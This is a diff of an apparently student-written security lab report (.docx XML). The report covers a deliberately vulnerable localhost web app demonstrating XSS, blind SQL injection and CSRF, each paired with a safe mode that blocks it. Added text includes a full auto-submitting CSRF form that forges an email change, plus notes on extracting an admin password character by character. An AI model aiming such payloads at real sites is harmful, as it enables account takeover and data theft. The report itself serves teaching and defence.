--- a/submission/Part_2_Report.docx
+++ b/submission/Part_2_Report.docx
@@ -116,7 +116,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>9 October 2026</w:t>
+        <w:t>11 October 2026</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -188,7 +188,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Evidence summary: 37 browser captures and six live HTTP regression test methods passed. Each evidence page records the exact input and observed result, followed by the original browser screenshot. The app footer shows the capture date and time in Pakistan Standard Time.</w:t>
+        <w:t>Evidence summary: 41 browser captures and six live HTTP regression test methods passed. Each evidence page records the exact input and observed result, followed by the original browser screenshot. The app footer shows the capture date and time in Pakistan Standard Time.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -237,7 +237,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 1 of 41</w:t>
+        <w:t>Page 1 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -467,7 +467,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 2 of 41</w:t>
+        <w:t>Page 2 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -648,16 +648,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Intermediate SQL injection: the enrollment lookup exposes only found or not found. Appending true and false predicates confirms injection; testing the first character</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> of the admin password reveals A without printing the password. Safe mode binds the reference as data.</w:t>
+        <w:t>Intermediate SQL injection: the enrollment lookup exposes only found or not found. Appending true and false predicates confirms injection; testing the first characte</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>r of the admin password reveals A without printing the password. Safe mode binds the reference as data.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -706,7 +706,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 3 of 41</w:t>
+        <w:t>Page 3 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -767,97 +767,88 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>The cross-site attacker is http://127.0.0.1:8001 and the target is http://localhost:8000. These are different origins and different sites. A newly issued vulnerable cookie omits SameSite. Chromium allows its top-level cross-site POST during the short default-cookie grace period. Therefore run the vulnerable attack immediately after login. The browser evidence script does this automatically without adding cookies manually.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Safe mode explicitly sets SameSite=Lax, so the cross-site POST does not carry the authenticated cookie. To exercise server-side protection too, an additional attacker request comes from http://localhost:8001: it is same-site but cross-origin, carries the session cookie, and receives HTTP 403 because its token and Origin are invalid. The profile remains unchanged.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>For the viva, first browse the d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ashboard and demonstrate normal login, course search, posting and email changes. For each XSS type, submit the payload through its actual UI, explain its source and sink, then repeat on safe mode. For stored XSS use a different unauthenticated browser context to establish persistence.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>For SQL injection, explain how quotes, comments and UNION alter the query structure. Demonstrate true/false inference, then follow the advanced chain in order. The final cards contain actual synth</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>etic records queried from SQLite, rather than a scripted success message.</w:t>
+        <w:t>The attacker is http://localhost:8001 and the target is http://localhost:8000. These are different origins on the same site. The attacker page submits a forged email update using the existing browser session, without a token. This genuine CSRF demonstration does not depend on the age of the session cookie. Visit /vulnerable for automatic submission, or /vulnerable?manual=1 to inspect the form before pressing Continue.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>SameSite=Lax does not stop a same-site, cross-origin request. The safe demonstration therefore sends the real authenticated session cookie and receives HTTP 403 from server-side token and Origin validation. The unchanged profile is checked after the attack. The additional cross-site URL http://127.0.0.1:8001 remains available, but its vulnerable success can depend on browser cookie policy; use localhost:8001 for the viva.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>For the viva, first browse the dashboard and demonstrate normal login, course search, posting and email changes. For each XSS type, submit the payload through its actual UI, explain its source and sink, then repeat on safe mode. For stored XSS use a different unauthenticated browser context to establish persistence.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>For SQL injection, explain how quotes, comments and UNION alter the query structure. Demonstrate true/false inference, then follow the adva</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>nced chain in order. The final cards contain actual synthetic records queried from SQLite, rather than a scripted success message.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -905,7 +896,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>The safe version addresses the assignment attack set. Production use would additionally require HTTPS and Secure cookies, session expiry, rate limiting, access-control policy and operational monitoring.</w:t>
+        <w:t>The safe version addresses the assignment attack set. Production use would additionally</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> require HTTPS and Secure cookies, session expiry, rate limiting, access-control policy and operational monitoring.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -954,7 +954,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 4 of 41</w:t>
+        <w:t>Page 4 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -991,7 +991,244 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Dashboard</w:t>
+        <w:t>CSRF Attack Payload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Run python app.py --attacker,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sign in as student at http://localhost:8000/vulnerable/login, then visit http://localhost:8001/vulnerable. The external document contains this complete attack payload:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;!doctype html&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>&lt;html&gt;&lt;body&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>&lt;form id="attack" method="post" action="http://localhost:8000/vulnerable/profile"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>&lt;input type="hidden" name="email" value="attacker@lab.invalid"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>&lt;button&gt;Continue&lt;/button&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>&lt;/form&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>&lt;script&gt;document.getElementById("attack").submit()&lt;/script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Repeat with safe in the target action and attacker URL after signing in to the safe version. The request has no csrf_token and an external Origin, so it receives HTTP 403. No email update is committed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>The setup screenshots use ?manual=1, which omits only the automatic submission script so the attacker form can be inspected. Pressing Continue sends the same forged POST. The automatic route is separately covered by the browser test.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page 5 of 46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Vulnerable Version Dashboard</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1039,7 +1276,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:30.059Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:07:56.327Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1088,7 +1325,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="1127BD60">
+        <w:pict w14:anchorId="08FC9955">
           <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
             <v:stroke joinstyle="miter"/>
             <v:formulas>
@@ -1136,7 +1373,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 5 of 41</w:t>
+        <w:t>Page 6 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1173,7 +1410,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Reflected Xss</w:t>
+        <w:t>Vulnerable Version XSS Reflected</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1245,7 +1482,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:30.909Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:07:57.263Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1294,7 +1531,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="3C98C8DE">
+        <w:pict w14:anchorId="5D9311F1">
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId5" o:title=""/>
           </v:shape>
@@ -1323,7 +1560,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 6 of 41</w:t>
+        <w:t>Page 7 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1360,7 +1597,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Dom Xss</w:t>
+        <w:t>Vulnerable Version XSS DOM Based</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1432,7 +1669,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:31.689Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:07:58.088Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1481,7 +1718,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="4C5EC0F1">
+        <w:pict w14:anchorId="6E243000">
           <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId6" o:title=""/>
           </v:shape>
@@ -1510,7 +1747,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 7 of 41</w:t>
+        <w:t>Page 8 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1547,7 +1784,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Stored Xss</w:t>
+        <w:t>Vulnerable Version XSS Stored</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1619,7 +1856,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:33.338Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:07:59.943Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1668,8 +1905,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="6A1CC4A6">
-          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+        <w:pict w14:anchorId="7D526DF3">
+          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:495pt;height:390pt">
             <v:imagedata r:id="rId7" o:title=""/>
           </v:shape>
         </w:pict>
@@ -1697,7 +1934,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 8 of 41</w:t>
+        <w:t>Page 9 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1734,7 +1971,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Csrf Before</w:t>
+        <w:t>Vulnerable Version Csrf Before</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1806,7 +2043,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:33.891Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:00.573Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1855,7 +2092,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="6CB1121B">
+        <w:pict w14:anchorId="5E511084">
           <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId8" o:title=""/>
           </v:shape>
@@ -1884,7 +2121,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 9 of 41</w:t>
+        <w:t>Page 10 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1921,103 +2158,103 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Csrf Response</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: External auto-submitting POST: email=attacker@lab.invalid; no CSRF token</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Cross-site form changed the authenticated profile.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:34.555Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
